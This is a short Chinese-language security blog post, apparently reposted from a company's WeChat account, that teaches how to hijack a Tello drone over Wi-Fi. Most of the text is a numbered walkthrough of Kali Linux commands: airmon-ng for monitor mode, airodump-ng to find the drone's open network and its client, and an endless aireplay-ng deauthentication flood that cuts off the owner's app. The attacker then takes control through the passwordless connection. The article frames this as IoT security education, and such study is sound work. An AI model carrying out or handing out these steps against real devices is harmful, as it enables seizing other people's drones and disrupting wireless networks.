众所周知,物联网领域有着众多种类,大到卫星、智能汽车,小到智能家居、智能手环,无不影响着我们的生活,其中的安全隐患可谓是层出不穷。
无人机这类设备通常可以以无线电通信为切入点(主要是新入手的还没舍得拆固件)。
讲到无线电通信,第一时间想到的当然是WiFi,而且既然是新设备处于未配置状态,如果wifi设置的是空口令或者弱口令,并且不绑定MAC地址,用常规的WiFi渗透思路通过泛洪攻击让对方设备掉线,然后重新用客户端连接并接管设备理论上是可行的。
1.启动kali,iwconfig查看无线网卡配置
2.airmon-ng start wlan0将wlan0开启监听模式
3.airodump-ng wlan0mon扫描网络,TELLO-EE8A75,就是你了
BSSID:WiFi MAC地址
PWR:信号强度
BEACONS:信标
DATA:数据
CH:信道
ENS:加密方式,图中OPN为开放
ESSID:WiFi名称
4.新建个终端airodump-ng wlan0mon –bssid <BSSID> –channel 9
STATION为无人机MAC地址
5.再新建个终端aireplay-ng –deauth 0 -c <STATION> -a <BSSID> wlan0mon看看效果去~
–deauth为冲突攻击模式,0为循环攻击
6.他的APP端屏黑了,解除身份验证了
7.登录APP客户端,因该设备默认为空口令,所以无需密码爆破直接连无人机wifi成功接管对方无人机。
———— / END / ————
那些年甜橙安全给你分享过的干货
– 甜橙竞赛 –
原文始发于微信公众号(甜橙安全应急响应中心):甜橙安全头条第34期|物联网安全-手把手教你“黑”无人机